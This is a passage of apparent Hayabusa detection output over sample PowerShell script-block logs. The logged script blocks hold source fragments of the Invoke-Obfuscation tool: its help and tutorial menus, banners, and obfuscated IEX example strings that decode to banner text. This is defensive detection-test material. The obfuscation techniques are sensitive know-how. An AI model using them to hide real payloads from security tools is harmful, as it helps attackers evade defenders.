Write-Host ""`n`nSHOW OPTIONS"" -NoNewLine -ForegroundColor Cyan Write-Host "" ::"" -NoNewLine Write-Host "" Yellow"" -NoNewLine -ForegroundColor Yellow Write-Host "" options can be set by entering"" -NoNewLine Write-Host "" SET OPTIONNAME VALUE"" -NoNewLine -ForegroundColor Green Write-Host "".`n"" ForEach($Option in $Script:OptionsMenu) { $OptionTitle = $Option[0] $OptionValue = $Option[1] $CanSetValue = $Option[2] Write-Host $LineSpacing -NoNewLine # For options that can be set by user, output as Yellow. If($CanSetValue) {Write-Host $OptionTitle -NoNewLine -ForegroundColor Yellow} Else {Write-Host $OptionTitle -NoNewLine} Write-Host "": "" -NoNewLine # Handle coloring and multi-value output for ExecutionCommands and ObfuscationLength. If($OptionTitle -eq 'ObfuscationLength') { Write-Host $OptionValue -ForegroundColor Cyan } ElseIf($OptionTitle -eq 'ScriptBlock') { Out-ScriptContents $OptionValue } ElseIf($OptionTitle -eq 'CommandLineSyntax') { # CLISyntax output. $SetSyntax = '' If(($Script:ScriptPath.Length -gt 0) -AND ($Script:ScriptPath -ne 'N/A')) { $SetSyntax = "" -ScriptPath '$Script:ScriptPath'"" } ElseIf(($Script:ScriptBlock.Length -gt 0) -AND ($Script:ScriptPath -eq 'N/A')) { $SetSyntax = "" -ScriptBlock {$Script:ScriptBlock}"" } $CommandSyntax = '' If($OptionValue.Count -gt 0) { $CommandSyntax = "" -Command '"" + ($OptionValue -Join ',') + ""' -Quiet"" } If(($SetSyntax -ne '') -OR ($CommandSyntax -ne '')) { $CliSyntaxToOutput = ""Invoke-Obfuscation"" + $SetSyntax + $CommandSyntax Write-Host $CliSyntaxToOutput -ForegroundColor Cyan } Else { Write-Host '' } } ElseIf($OptionTitle -eq 'ExecutionCommands') { # ExecutionCommands output. 
If($OptionValue.Count -gt 0) {Write-Host ''} $Counter = 0 ForEach($ExecutionCommand in $OptionValue) { $Counter++ If($ExecutionCommand.Length -eq 0) {Write-Host ''; Continue} $ExecutionCommand = $ExecutionCommand.Replace('$ScriptBlock','~').Split('~') Write-Host "" $($ExecutionCommand[0])"" -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta # Handle output formatting when SHOW OPTIONS is run. If(($OptionValue.Count -gt 0) -AND ($Counter -lt $OptionValue.Count)) { Write-Host $ExecutionCommand[1] -ForegroundColor Cyan } Else { Write-Host $ExecutionCommand[1] -NoNewLine -ForegroundColor Cyan } } Write-Host '' } ElseIf($OptionTitle -eq 'ObfuscatedCommand') { Out-ScriptContents $OptionValue } Else { Write-Host $OptionValue -ForegroundColor Magenta } } } Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. 
If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } } Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> Write-Host ""`n`nTUTORIAL"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Here is a quick tutorial showing you how to get your obfuscation on:"" Write-Host ""`n1) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Load a scriptblock (SET SCRIPTBLOCK) or a script path/URL (SET SCRIPTPATH)."" Write-Host "" SET SCRIPTBLOCK Write-Host 'This is my test command' -ForegroundColor Green"" -ForegroundColor Green Write-Host ""`n2) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Navigate through the obfuscation menus where the options are in"" -NoNewLine Write-Host "" YELLOW"" -NoNewLine -ForegroundColor Yellow Write-Host ""."" Write-Host "" GREEN"" -NoNewLine -ForegroundColor Green Write-Host "" options apply obfuscation."" Write-Host "" Enter"" -NoNewLine Write-Host "" BACK"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CD .."" -NoNewLine -ForegroundColor Yellow Write-Host "" to go to previous menu and"" -NoNewLine Write-Host "" HOME"" -NoNewline -ForegroundColor Yellow Write-Host ""/"" -NoNewline Write-Host ""MAIN"" -NoNewline -ForegroundColor Yellow Write-Host "" to go to home menu.`n E.g. 
Enter"" -NoNewLine Write-Host "" ENCODING"" -NoNewLine -ForegroundColor Yellow Write-Host "" & then"" -NoNewLine Write-Host "" 5"" -NoNewLine -ForegroundColor Green Write-Host "" to apply SecureString obfuscation."" Write-Host ""`n3) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" TEST"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""EXEC"" -NoNewLine -ForegroundColor Yellow Write-Host "" to test the obfuscated command locally.`n Enter"" -NoNewLine Write-Host "" SHOW"" -NoNewLine -ForegroundColor Yellow Write-Host "" to see the currently obfuscated command."" Write-Host ""`n4) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" COPY"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""CLIP"" -NoNewLine -ForegroundColor Yellow Write-Host "" to copy obfuscated command out to your clipboard."" Write-Host "" Enter"" -NoNewLine Write-Host "" OUT"" -NoNewLine -ForegroundColor Yellow Write-Host "" to write obfuscated command out to disk."" Write-Host ""`n5) "" -NoNewLine -ForegroundColor Cyan Write-Host ""Enter"" -NoNewLine Write-Host "" RESET"" -NoNewLine -ForegroundColor Yellow Write-Host "" to remove all obfuscation and start over.`n Enter"" -NoNewLine Write-Host "" UNDO"" -NoNewLine -ForegroundColor Yellow Write-Host "" to undo last obfuscation.`n Enter"" -NoNewLine Write-Host "" HELP"" -NoNewLine -ForegroundColor Yellow Write-Host ""/"" -NoNewLine Write-Host ""?"" -NoNewLine -ForegroundColor Yellow Write-Host "" for help menu."" Write-Host ""`nAnd finally the obligatory `""Don't use this for evil, please`"""" -NoNewLine -ForegroundColor Cyan Write-Host "" :)"" -ForegroundColor Green } Function Out-ScriptContents { <# .SYNOPSIS HELPER FUNCTION :: Displays current obfuscated command for Invoke-Obfuscation. 
Invoke-Obfuscation Function: Out-ScriptContents Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ScriptContents displays current obfuscated command for Invoke-Obfuscation. .PARAMETER ScriptContents Specifies the string containing your payload. .PARAMETER PrintWarning Switch to output redacted form of ScriptContents if they exceed 8,190 characters. .EXAMPLE C:\PS> Out-ScriptContents .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> Param( [Parameter(ValueFromPipeline = $true)] [String] $ScriptContents, [Switch] $PrintWarning ) If($ScriptContents.Length -gt $CmdMaxLength) { # Output ScriptContents, handling if the size of ScriptContents exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ""[*] ObfuscatedCommand: "".Length $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $ScriptContents.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Magenta Write-",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow 
Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. .EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. 
$Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. 
Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. 
'((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. 
Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Host $RedactionMessage -NoNewLine -ForegroundColor Yellow Write-Host $ScriptContents.SubString($ScriptContents.Length-$RedactedPrintLength) -ForegroundColor Magenta } Else { Write-Host $ScriptContents -ForegroundColor Magenta } # Make sure final command doesn't exceed cmd.exe's character limit. If($ScriptContents.Length -gt $CmdMaxLength) { If($PSBoundParameters['PrintWarning']) { Write-Host ""`nWARNING: This command exceeds the cmd.exe maximum length of $CmdMaxLength."" -ForegroundColor Red Write-Host "" Its length is"" -NoNewLine -ForegroundColor Red Write-Host "" $($ScriptContents.Length)"" -NoNewLine -ForegroundColor Yellow Write-Host "" characters."" -ForegroundColor Red } } } Function Show-AsciiArt { <# .SYNOPSIS HELPER FUNCTION :: Displays random ASCII art for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-AsciiArt Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-AsciiArt displays random ASCII art for Invoke-Obfuscation, and also displays ASCII art during script startup. 
.EXAMPLE C:\PS> Show-AsciiArt .NOTES Credit for ASCII art font generation: http://patorjk.com/software/taag/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [Switch] $Random ) # Create multiple ASCII art title banners. $Spacing = ""`t"" $InvokeObfuscationAscii = @() $InvokeObfuscationAscii += $Spacing + ' ____ __ ' $InvokeObfuscationAscii += $Spacing + ' / _/___ _ ______ / /_____ ' $InvokeObfuscationAscii += $Spacing + ' / // __ \ | / / __ \/ //_/ _ \______ ' $InvokeObfuscationAscii += $Spacing + ' _/ // / / / |/ / /_/ / ,< / __/_____/ ' $InvokeObfuscationAscii += $Spacing + '/______ /__|_________/_/|_|\___/ __ _ ' $InvokeObfuscationAscii += $Spacing + ' / __ \/ /_ / __/_ ________________ _/ /_(_)___ ____ ' $InvokeObfuscationAscii += $Spacing + ' / / / / __ \/ /_/ / / / ___/ ___/ __ `/ __/ / __ \/ __ \' $InvokeObfuscationAscii += $Spacing + '/ /_/ / /_/ / __/ /_/ (__ ) /__/ /_/ / /_/ / /_/ / / / /' $InvokeObfuscationAscii += $Spacing + '\____/_.___/_/ \__,_/____/\___/\__,_/\__/_/\____/_/ /_/ ' # Ascii art to run only during script startup. If(!$PSBoundParameters['Random']) { $ArrowAscii = @() $ArrowAscii += ' | ' $ArrowAscii += ' | ' $ArrowAscii += ' \ / ' $ArrowAscii += ' V ' # Show actual obfuscation example (generated with this tool) in reverse. 
Write-Host ""`nIEX( ( '36{78Q55@32t61_91{99@104X97{114Q91-32t93}32t93}32t34@110m111@105}115X115-101m114_112@120@69-45{101@107X111m118m110-73Q124Q32X41Q57@51-93Q114_97_104t67t91{44V39Q112_81t109@39}101{99@97}108{112}101}82_45m32_32X52{51Q93m114@97-104{67t91t44t39V98t103V48t39-101}99}97V108}112t101_82_45{32@41X39{41_112t81_109_39m43{39-110t101@112{81t39X43@39t109_43t112_81Q109t101X39Q43m39}114Q71_112{81m109m39@43X39V32Q40}32m39_43_39{114-111m108t111t67{100m110{117Q39_43m39-111-114Q103_101t114@39m43-39{111t70-45}32m41}98{103V48V110Q98t103{48@39{43{39-43{32t98m103_48{111@105t98@103V48-39@43{39_32-32V43V32}32t98t103@48X116m97V99t98X103t48_39V43m39@43-39X43Q39_98@103@48}115V117V102Q98V79m45@98m39Q43{39X103_39X43Q39V48}43-39}43t39}98-103{48V101_107Q39t43X39_111X118X110V39X43}39t98_103{48@43}32_98{103}48{73{98-39@43t39m103_39}43{39{48Q32t39X43X39-32{40V32t41{39Q43V39m98X103{39_43V39{48-116{115Q79{39_43_39}98}103m48{39Q43t39X32X43{32_98@103-39@43m39X48_72-39_43t39V45m39t43Q39_101Q98}103_48-32_39Q43V39V32t39V43}39m43Q32V98X39Q43_39@103_48V39@43Q39@116X73t82V119m98-39{43_39}103Q48X40_46_32m39}40_40{34t59m91@65V114V114@97_121}93Q58Q58V82Q101Q118Q101{114}115_101m40_36_78m55@32t41t32-59{32}73{69V88m32{40t36V78t55}45Q74m111@105-110m32X39V39-32}41'.SpLiT( '{_Q-@t}mXV' ) |ForEach-Object { ([Int]`$_ -AS [Char]) } ) -Join'' )"" -ForegroundColor Cyan Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""`$N7 =[char[ ] ] `""noisserpxE-ekovnI| )93]rahC[,'pQm'ecalpeR- 43]rahC[,'bg0'ecalpeR- )')pQm'+'nepQ'+'m+pQme'+'rGpQm'+' ( '+'roloCdnu'+'orger'+'oF- )bg0nbg0'+'+ bg0oibg0'+' + bg0tacbg0'+'+'+'bg0sufbO-b'+'g'+'0+'+'bg0ek'+'ovn'+'bg0+ bg0Ib'+'g'+'0 '+' ( )'+'bg'+'0tsO'+'bg0'+' + bg'+'0H'+'-'+'ebg0 '+' '+'+ b'+'g0'+'tIRwb'+'g0(. 
'((`"";[Array]::Reverse(`$N7 ) ; IEX (`$N7-Join '' )"" -ForegroundColor Magenta Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host "".(`""wRIt`"" + `""e-H`"" + `""Ost`"") ( `""I`"" +`""nvoke`""+`""-Obfus`""+`""cat`"" + `""io`"" +`""n`"") -ForegroundColor ( 'Gre'+'en')"" -ForegroundColor Yellow Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line -NoNewline; Write-Host $Line} Start-Sleep -Milliseconds 100 Write-Host ""Write-Host `""Invoke-Obfuscation`"" -ForegroundColor Green"" -ForegroundColor White Start-Sleep -Milliseconds 650 ForEach($Line in $ArrowAscii) {Write-Host $Line} Start-Sleep -Milliseconds 100 # Write out below string in interactive format. Start-Sleep -Milliseconds 100 ForEach($Char in [Char[]]'Invoke-Obfuscation') { Start-Sleep -Milliseconds (Get-Random -Input @(25..200)) Write-Host $Char -NoNewline -ForegroundColor Green } Start-Sleep -Milliseconds 900 Write-Host """" Start-Sleep -Milliseconds 300 Write-Host # Display primary ASCII art title banner. $RandomColor = (Get-Random -Input @('Green','Cyan','Yellow')) ForEach($Line in $InvokeObfuscationAscii) { Write-Host $Line -ForegroundColor $RandomColor } } Else { # ASCII option in Invoke-Obfuscation interactive console. } # Output tool banner after all ASCII art. 
Write-Host """" Write-Host ""`tTool :: Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tAuthor :: Daniel Bohannon (DBO)"" -ForegroundColor Magenta Write-Host ""`tTwitter :: @danielhbohannon"" -ForegroundColor Magenta Write-Host ""`tBlog :: http://danielbohannon.com"" -ForegroundColor Magenta Write-Host ""`tGithub :: https://github.com/danielbohannon/Invoke-Obfuscation"" -ForegroundColor Magenta Write-Host ""`tVersion :: 1.8"" -ForegroundColor Magenta Write-Host ""`tLicense :: Apache License, Version 2.0"" -ForegroundColor Magenta Write-Host ""`tNotes :: If(!`$Caffeinated) {Exit}"" -ForegroundColor Magenta }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.309 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:56.683 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:56.745 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_.ModuleType -eq 'Manifest'},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:05.348 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-HelpMenu { <# .SYNOPSIS HELPER FUNCTION :: Displays help menu for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-HelpMenu Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-HelpMenu displays help menu for Invoke-Obfuscation. 
.EXAMPLE C:\PS> Show-HelpMenu .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Show Help Menu. Write-Host ""`n`nHELP MENU"" -NoNewLine -ForegroundColor Cyan Write-Host "" :: Available"" -NoNewLine Write-Host "" options"" -NoNewLine -ForegroundColor Yellow Write-Host "" shown below:`n"" ForEach($InputOptionsList in $AllAvailableInputOptionsLists) { $InputOptionsCommands = $InputOptionsList[0] $InputOptionsDescription = $InputOptionsList[1] # Add additional coloring to string encapsulated by <> if it exists in $InputOptionsDescription. If($InputOptionsDescription.Contains('<') -AND $InputOptionsDescription.Contains('>')) { $FirstPart = $InputOptionsDescription.SubString(0,$InputOptionsDescription.IndexOf('<')) $MiddlePart = $InputOptionsDescription.SubString($FirstPart.Length+1) $MiddlePart = $MiddlePart.SubString(0,$MiddlePart.IndexOf('>')) $LastPart = $InputOptionsDescription.SubString($FirstPart.Length+$MiddlePart.Length+2) Write-Host ""$LineSpacing $FirstPart"" -NoNewLine Write-Host $MiddlePart -NoNewLine -ForegroundColor Cyan Write-Host $LastPart -NoNewLine } Else { Write-Host ""$LineSpacing $InputOptionsDescription"" -NoNewLine } $Counter = 0 ForEach($Command in $InputOptionsCommands) { $Counter++ Write-Host $Command.ToUpper() -NoNewLine -ForegroundColor Yellow If($Counter -lt $InputOptionsCommands.Count) {Write-Host ',' -NoNewLine} } Write-Host '' } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:32.699 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$_[1].Trim()},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:32.703 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput 
= $TempUserInput.Replace([String]([Char]$_),'')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:32.714 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$TempUserInput = $TempUserInput.Replace($_,'')}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:16:37.997 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"Function Show-Tutorial { <# .SYNOPSIS HELPER FUNCTION :: Displays tutorial information for Invoke-Obfuscation. Invoke-Obfuscation Function: Show-Tutorial Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Show-Tutorial displays tutorial information for Invoke-Obfuscation. .EXAMPLE C:\PS> Show-Tutorial .NOTES This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
